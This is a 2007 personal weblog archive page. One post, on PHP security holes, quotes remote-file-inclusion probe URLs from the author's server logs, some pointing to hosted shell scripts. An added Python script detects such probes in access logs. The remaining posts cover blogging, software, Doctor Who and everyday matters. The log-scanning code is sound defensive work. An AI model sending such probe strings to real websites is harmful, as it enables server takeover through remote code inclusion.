
Alden Bates' Weblog

June 2007 Archives

June 25, 2007

PHP and Security Holes

Filed in: Website Management.

Watch out - I'm about to make myself sound like a snob. :)

What is it about PHP that spawns applications with security holes? My site gets hit a lot by people/bots probing for security holes, and said hack attempts exclusively include "php" somewhere in the URL. Witness a smattering of hack attempts that have occurred recently:

  • /index.php?plugin=http://perdu.ch/cgi-bin/echo?
  • ///plugin/HP_DEV/cms2.php?s_dir=http://secretagent.by.ru/r57.php??
  • /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.kebcomputer.com/cache/tests.txt??
  • /get_session_vars.php?path_to_smf=http://www.eclypse.info/oche?
  • /archives/2005/bridges/SMF/logout.php?path_to_smf=http://utenti.lycos.it/r57/stringa.txt?
  • /index.php3?p=http://www.freewebs.com/enemyownz/id.txt?
  • /index.php3?i=http://80.201.236.78/~pat/evilx?
  • /plugins/%3Cwbr%20/%3Epagedarchives.html/index.php?page=http://www.techgoiania.com.br/components/com_juice/canboy1?

As an aside, even an idiot could see that last URL wouldn't work. Evidently the tool used to probe it was written by a chimp. But I digress.

What's with all the security holes in PHP apps? Is it just that PHP is so popular for web development that it has the same problem as Windows (the majority use it, so hacks are more common)? Of course, all of the URLs there have something in common: each passes a URL in a query parameter and obviously counts on the application in question using that input from the end user without validating it first. Is there something in PHP which tends to encourage this sort of thing, or is it just that it's so widely used that it attracts more lazy programming?

Of course, both Wordpress and Movable Type (both applications which I use on this site) have had security holes - one uses PHP, the other uses Perl, and both are written to a very high standard. Both are also widely used, which suggests to me that PHP is a victim of its own success. Like Windows, they're so common that any security holes are highly sought after by hackers.

That said, I'd be extremely hesitant about installing any other PHP applications here...
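The one thing every probe above shares is a query parameter whose value is an absolute URL, which is exactly what a log scanner can key on. As an added example (not code from the original post), the Python script below runs that check over constructed Apache "combined"-format access log lines wrapped around the probe URLs quoted above; the IPs, timestamps, status codes and user agent are made up, and the log format is an assumption.

```python
"""Flag remote-file-inclusion style probes in web server access logs.

Added example, not code from the original post.  The request targets are
the probe URLs quoted in the post; everything else in the sample log lines
(IPs, timestamps, statuses, user agent) is constructed.
"""
import re
from urllib.parse import parse_qsl

# Apache "combined" format (assumed): ip - user [time] "METHOD target PROTO" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# The signature shared by every probe in the post: a parameter whose value is an
# absolute URL, in the hope that the script hands it to include()/require()
# without validation.  Extend the scheme list if your apps see other wrappers.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_log_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_params(target):
    """Return [(param, value)] for every query parameter whose value is a remote URL."""
    _path, _sep, query = target.partition('?')   # split only at the first '?'
    hits = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value.strip()):
            hits.append((key, value))
    return hits


def scan(lines):
    """Return one finding per log line carrying at least one remote-URL parameter."""
    findings = []
    for line in lines:
        fields = parse_log_line(line)
        if not fields:
            continue                               # skip lines in another format
        hits = rfi_params(fields['target'])
        if hits:
            findings.append({
                'ip': fields['ip'],
                'status': int(fields['status']),
                'target': fields['target'],
                'params': hits,
            })
    return findings


# Constructed sample log: five probe targets from the post plus three benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jun/2007:19:02:11 +1200] "GET /index.php?plugin=http://perdu.ch/cgi-bin/echo? HTTP/1.0" 404 312 "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [25/Jun/2007:19:02:12 +1200] "GET ///plugin/HP_DEV/cms2.php?s_dir=http://secretagent.by.ru/r57.php?? HTTP/1.0" 404 312 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [25/Jun/2007:19:40:05 +1200] "GET /plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://www.kebcomputer.com/cache/tests.txt?? HTTP/1.0" 404 312 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [25/Jun/2007:19:40:06 +1200] "GET /get_session_vars.php?path_to_smf=http://www.eclypse.info/oche? HTTP/1.0" 404 312 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [25/Jun/2007:19:40:07 +1200] "GET /plugins/%3Cwbr%20/%3Epagedarchives.html/index.php?page=http://www.techgoiania.com.br/components/com_juice/canboy1? HTTP/1.0" 404 312 "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [25/Jun/2007:20:01:30 +1200] "GET /archives/2007/06/ HTTP/1.1" 200 9182 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [25/Jun/2007:20:01:31 +1200] "GET /index.php?page=about HTTP/1.1" 200 4011 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [25/Jun/2007:20:02:02 +1200] "GET /search.php?q=http+proxy&sort=date HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]


def main():
    for f in scan(SAMPLE_LOG):
        params = ', '.join(f'{k}={v}' for k, v in f['params'])
        print(f"{f['ip']} status={f['status']} {params}")


if __name__ == '__main__':
    main()
```

The benign `q=http+proxy` request shows why the check anchors on `scheme://` at the start of the decoded value rather than on the substring "http": the point is to catch a parameter being fed a fetchable location, not any mention of the web. A 404 on these probes, as in the sample, means the script they were aimed at isn't installed; the lines still worth a second look are the ones that come back 200.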

Posted at 8:34 PM | Comments (2)

June 24, 2007

So where did blogwise go?

Filed in: Weblogging.

I noticed the other day that one of the larger blog directories, blogwise.com, seems to have gone bye bye. The domain's still registered, but resolves to 0.0.0.0 and the most recent cached pages I can find in Google are from late April. Is it an... ex-directory? Seriously, what the heck's happened there?

Posted at 10:25 PM | Comments (0)

June 19, 2007

Midi to Wav conversion

Filed in: Computers, Links.

You know, I swear back in the early days of the internet if you wanted something like, oh, a program to convert a midi file into a wav file, you could just go look on your favourite FTP site and download a tiny DOS program which would do it. Does anyone else remember those days? Now it seems like all the programs on offer for doing this require you to fork out $25. WTF?

I wanted to convert a midi file to a wav file, so I took the following steps:

  1. Downloaded one of the many shareware midi2wav converters.
  2. Ran the installer.
  3. Ran up the software.
  4. Discovered that pressing ENTER in the software would quit out of it without prompting "Are you sure you want to quit?"
  5. Restarted the software, attempted the conversion, got a cryptic error.
  6. Figuring the previous attempt had locked some audio drivers, rebooted the PC.
  7. Reran the program - discovered that the cryptic error actually meant the target directory I'd specified didn't exist. Converted the file.
  8. Played the resulting output file, to discover that the shareware software had produced a 1 minute long, completely silent wav file.
  9. Uninstalled the software.

Is this how software works these days? You download it, install it, and hope it works and doesn't deposit any spyware on your PC? Man.

I got the midi file converted in the end, thanks to a page which gave instructions on converting midi files to wav files using Winamp.

Posted at 9:51 PM | Comments (5)

June 16, 2007

Paged Archives v1.30

Filed in: Movable Type.

This release adds in a MTPAEntryLink tag, which is a paging-aware version of the standard MTEntryLink tag - you can use it to link to the Monthly or Category archive page which an entry appears on. It assumes you're not using the MTPASettings tag to alter the number of items per page, and that the items are in reverse chronological order. I might add an argument later to allow for forward ordering as well. This tag was requested by Blogosfere.

According to the MT wiki MT4 plugin compatibility list, PagedArchives is compatible with Movable Type 4* - hopefully nothing in this release breaks that. I haven't downloaded the version 4 beta to look at yet.

You can download this plugin on the Paged Archives page.

* Though it would have been nice if it was listed in the "rendered obsolete" section.

Posted at 4:46 PM | Comments (49)

June 15, 2007

Kinja Tags

Filed in: Weblogging.

I happened upon the Kinja page for this weblog (they haven't updated the URL, despite the 301 redirect, but that's not uncommon - Technorati have it listed twice) and noticed that Kinja pages seem to have a list of links along the top to subjects related to the blog they're indexing. The list of links for mine reads:
search - yahoo - conservative - featured - google - gossip - media - new york - open source - security

From what I can gather from Kinja's help pages, these are tags applied by site users, so it appears someone there thinks my weblog is New York related... Maybe it's because I've written about Moby a couple of times? And what does "featured" mean?

Most of the others I can see, but "conservative"? I hardly ever write about political stuff! #drwhochat, an IRC channel I've hung around in forever, has a rule about no political discussion because they never end well, and that's a rule I've brought over to here, because I really like avoiding flame wars.

That's a very confusing listing.

Edit: I contacted Kinja and they've corrected the URL on the listing - cool! Thanks, guys! :)

Posted at 9:00 PM | Comments (0)

June 13, 2007

Webcomic: Jesus versus Doctor Who

Filed in: Links.

Jesus versus Doctor Who

And, lo, the people rejoiced, and the Doctor said unto them "Fantastic!"

Posted at 6:44 PM | Comments (1)

June 11, 2007

Energy Drink Review: Go Fast!

Filed in: Energy Drinks.

Go Fast! appears to be an American product, though this can seems to have been imported from Australia. It contains Australian Honey ("The best honey for optimum taste" - my inner Kiwi is making a face right now), taurine, ginseng, vitamin B6, vitamin B12, ginkgo biloba, guarana, riboflavin, niacin, and milk thistle herb ("provides good kidney and liver health"). Quite what the cumulative effects of these ingredients are likely to be, I'm not sure. It sounds like a mad scientist's idea of how to make an energy drink. It also describes itself as "The athlete's energy drink" (Note that in general caffeine plus exercise is not recommended).

It tastes... very tangy. There's a definite hint of honey there, but the main flavour is very harsh and sharp, not unlike Red Bull, and with the same lingering aftertaste (albeit still with a hint of honey).

Posted at 7:06 PM | Comments (2)

June 9, 2007

TSV 47

Filed in: Doctor Who, TSV Online.

Today TSV 47 went online, and there's a substantial bias towards the books this issue, with an article on the making of Just War, an interview with David Bishop on his novel Who Killed Kennedy, and an article on items cut from the DisContinuity Guide, as well as the already-online Not So New Adventures article on Transit. There are articles touching on other topics, such as Paul Scoones' piece on the aborted Doctor Who: The Motion Picture.

There's also another installment of Tardis Tales and one of my favourites of the TSV comic strips, a post-War Games second Doctor adventure named Hyperborea, written by David Ronayne and drawn by Peter Adamson. Speaking of which, David's letter says he was situated in Ulaan Baatar, Outer Mongolia - what was up with that?! There's also a letter from one Alden Bates writing about the rumour that the Doctor would reveal in the Paul McGann TV Movie that he was half-human. As it turns out, sometimes rumours can be true... These days, that letter would have needed a spoiler warning on it. :)

Next issue: lots and lots about the TV Movie!
See also: write-ups by Paul and Jamas!
Previously: TSV 46

Posted at 5:28 PM | Comments (2)

June 8, 2007

Doctor Who Series 3 (episodes 6 - 9)

Filed in: Doctor Who.

This time on Doctor Who, things take a turn for the better! Spoilers ahead:

Continue reading "Doctor Who Series 3 (episodes 6 - 9)"

Posted at 8:39 PM | Comments (2)

June 5, 2007

The Street Value of Feijoas

Filed in: Tetrap.Local.

I was walking back to work from a shop this afternoon when a random passerby asked "Are you into feijoas?" and opened his bag to show off a plastic bag full of them. At that point I was starting to wonder if I'd stepped into a bizarre Twilight Zone where feijoas were illegal street drugs and was going to ask if they were pure. Instead I opted to say "Uh, no thanks" and walk on before he started pushing oranges or something. Surreal!

Posted at 8:21 PM | Comments (0)

June 3, 2007

Some random things

Filed in: Misc.

  • I attended the Conspiracy II convention yesterday. The convention is on all Queen's birthday weekend. Among the panels I went to were A History of New Zealand Science Fiction Comics: 1928-2007 and ESP 101. The first was very interesting, as I didn't know a hell of a lot about comics in NZ, outside those which appeared in the Listener and TSV. The latter turned out to be a practical workshop, where we rolled dice and attempted to use pendulums to detect coins hidden under books, and the contents of tin cans. I found I have no ESP ability whatsoever.
  • LiveJournal, last week, purged a whole pile of journals reported by a Neo-Nazi group for being paedophiles - many weren't and users were unhappy. Go figure.
  • Kiwi DW fanzine Reverse the Polarity is turning their web site into a blog. I got RTP issue 24 in the mail recently, and it was great!
  • As you may have noticed, the Tetrap picture on my weblog has changed. The new one was inspired by a similar image on the layout of a blog I saw on Blog Explosion (Write on Track, I think).

Posted at 10:23 AM | Comments (0)
